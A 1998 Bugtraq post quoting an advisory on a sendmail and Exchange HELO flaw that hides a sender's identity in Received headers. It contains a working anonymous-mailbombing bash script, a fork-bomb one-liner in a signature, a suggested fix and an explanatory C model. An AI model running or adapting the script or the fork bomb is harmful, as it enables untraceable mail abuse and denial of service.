[6850] in bugtraq
MS Exchange vulnerable. (was: about sendmail 8.8.8 HELO hole)
daemon@ATHENA.MIT.EDU (Yuri Krichevsky)
Thu May 28 16:57:08 1998
Date: Wed, 27 May 1998 21:06:17 +0300
Reply-To: Yuri Krichevsky <yury@BISTBN.COM>
From: Yuri Krichevsky <yury@BISTBN.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980522121734.11307A-100000@pns.netbg.com>
Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too.
--
"BSD code sucks. Of course, everything else sucks far more."
- Theo de Raadt (OpenBSD President)
> -----Original Message-----
> From: Michał Zalewski <lcamtuf@boss.staszic.waw.pl>
> To: info@rootshell.com <info@rootshell.com>
> Date: 10 January 1998 12:28
> Subject: Sendmail 8.8.8 (qmail?) HELO hole.
>
>
> Here's a brief description of a Sendmail (qmail) hole I found
> recently:
>
> When someone mailbombs you, or tries to send fakemail, spam, etc.,
> sendmail normally attaches the sender's host name and its address
> to the outgoing message:
>
> --
> From spam@flooders.net Mon Jan 5 22:08:21 1998
> Received: from spammer (marc@math.university.edu [150.129.84.5])
> by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
> for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
> Date: Mon, 5 Jan 1998 22:07:54 +0100
> From: spam@flooders.net
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!!
> --
>
> That's perfect - now you know who is responsible for that annoying
> junk in your mailbox: "Received: from spammer (marc@math.university.edu
> [150.129.84.5])". Nothing easier...
> But I found a small hole, which allows a user to hide their identity
> and send mails anonymously. The only thing you should do is to
> pass a HELO string longer than approx. 1024 B - the sender's location and
> other very useful information will be cropped!!! The message
> headers should become uninteresting. Sometimes the sender
> may become quite untraceable (but not always, if it's possible
> to obtain logs from the machine which was used to send):
>
> --
> From spam@flooders.net Mon Jan 5 22:09:05 1998
> Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
> Date: Mon, 5 Jan 1998 22:08:52 +0100
> From: spam@flooders.net
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!! Now guess who am I...
> --
>
>
> Here's a simple example of Sendmail's HELO hole usage. Note, this
> script has been written ONLY to show how easy sending
> fakemails and mailbombs may be, with the cooperation of Sendmail ;) The script is
> very slow and restricted in many ways, but explains the problem
> well (note, some non-Berkeley daemons are also affected,
> probably Qmail?):
>
> -- EXPLOIT CODE --
> #!/bin/bash
> TMPDIR=/tmp/`whoami`
> PLIK=$TMPDIR/.safe
> TIMEOUT=2
> LIMIT=10
> MAX=20
>
> echo
> echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
> echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
> echo
>
> if [ "$4" = "" ]; then
> echo "USAGE: $0 msgfile address server sender"
> echo
> echo " msgfile - file to send as a message body"
> echo " address - address of lucky recipient"
> echo " server - outgoing smtp server w/sendmail"
> echo " sender - introduce yourself"
> echo
> echo "WARNING: For educational use ONLY. Mailbombing is illegal."
> echo "Think twice BEFORE you use this program in any way. Also,"
> echo "I've never said this program is 100% safe nor bug-free."
> echo
> sleep 1
> exit 0
> fi
>
> if [ ! -f $1 ]; then
> echo "Message file not found."
> echo
> exit 0
> fi
>
> echo -n "Preparing message..."
> mkdir $TMPDIR &>/dev/null
> chmod 700 $TMPDIR
> echo "echo \"helo
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
> safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
> afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
> mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb_\"" >$PLIK
> echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
> echo "echo \"rcpt to: $2\"" >>$PLIK
> echo "echo \"data\"" >>$PLIK
> echo "cat <<__qniec__" >>$PLIK
> cat $1 >>$PLIK
> echo "__qniec__" >>$PLIK
> echo "echo \".\"" >>$PLIK
> echo "echo \"quit\"" >>$PLIK
> echo "sleep $TIMEOUT" >>$PLIK
> chmod +x $PLIK
> echo "OK"
>
> echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
> SENT=0
>
> while [ -f $1 ]; do
> $PLIK|telnet $3 25 &>/dev/null &
> let SENT=SENT+1
> echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
> CONNECTED=`ps|grep -c "telnet $3"`
> if [ "$LIMIT" -le "$CONNECTED" ]; then
> while [ "$LIMIT" -le "$CONNECTED" ]; do
> sleep 1
> done
> fi
> if [ "$SENT" -ge "$MAX" ]; then
> echo "It's just an example, sorry."
> echo
> exit 0
> fi
> done
> -- EOF --
>
> Suggested fix: insert an additional length limit into the HELO/EHLO
> parameter scanning routine OR disable AllowBogusHELO (but it
> may cause serious troubles). I have no 8.8.8 sources at the
> time, so excuse me if it's unclear.
>
> PS:
>
> --
> From: Gregory Neil Shapiro <sendmail+gshapiro@sendmail.org>
>
> I was able to reproduce the header problem by lengthening the HELO string
> in your script.
>
> [...]
>
> This will be fixed in sendmail 8.9.
> --
>
> _______________________________________________________________________
> Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
> To iterate is human, to recurse divine [P. Deutsch]
> =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
>
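As an added illustration of the mechanism the quoted post describes and the fix it suggests: a hypothetical C model written for this page, not sendmail's actual code. The 1024-byte header buffer, the 256-byte HELO cap and the constructed 1500-byte HELO are assumptions; the verified sender string is the post's own sample.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed sizes for this model: a header buffer of about the 1024 bytes
 * the post mentions, and the cap the fixed variant applies to HELO. */
#define HDRBUF   1024
#define HELO_MAX 256
#define VERIFIED "marc@math.university.edu [150.129.84.5]" /* post's sample */

/* Vulnerable shape: the unchecked HELO argument is written first and the
 * verified "(user@host [ip])" part last, so truncation drops the latter. */
void build_received_vuln(char *out, size_t outsz, const char *helo, const char *verified) {
    snprintf(out, outsz, "Received: from %s (%s)", helo, verified);
}

/* The post's suggested fix: limit the HELO/EHLO parameter length before
 * it reaches the header, so the verified part always fits. */
void build_received_fixed(char *out, size_t outsz, const char *helo, const char *verified) {
    size_t n = strlen(helo);
    if (n > HELO_MAX)
        n = HELO_MAX;
    snprintf(out, outsz, "Received: from %.*s (%s)", (int)n, helo, verified);
}

/* Defender-side check on a Received: line: a cropped header no longer
 * carries the "[ip]" bracket pair that the verified part provides. */
bool has_verified_ip(const char *hdr) {
    const char *lb = strrchr(hdr, '[');
    const char *rb = strrchr(hdr, ']');
    return lb != NULL && rb != NULL && rb > lb;
}

/* Builds the header from a constructed 1500-byte HELO (like the post's
 * "[a lot of 'x's]") and reports whether the verified part survived. */
bool verified_survives(bool use_fix) {
    char helo[1501], hdr[HDRBUF];
    memset(helo, 'x', sizeof helo - 1);
    helo[sizeof helo - 1] = '\0';
    if (use_fix)
        build_received_fixed(hdr, sizeof hdr, helo, VERIFIED);
    else
        build_received_vuln(hdr, sizeof hdr, helo, VERIFIED);
    return has_verified_ip(hdr);
}

int main(void) {
    printf("vulnerable keeps [ip]: %d  fixed keeps [ip]: %d\n",
           verified_survives(false), verified_survives(true));
    return 0;
}
```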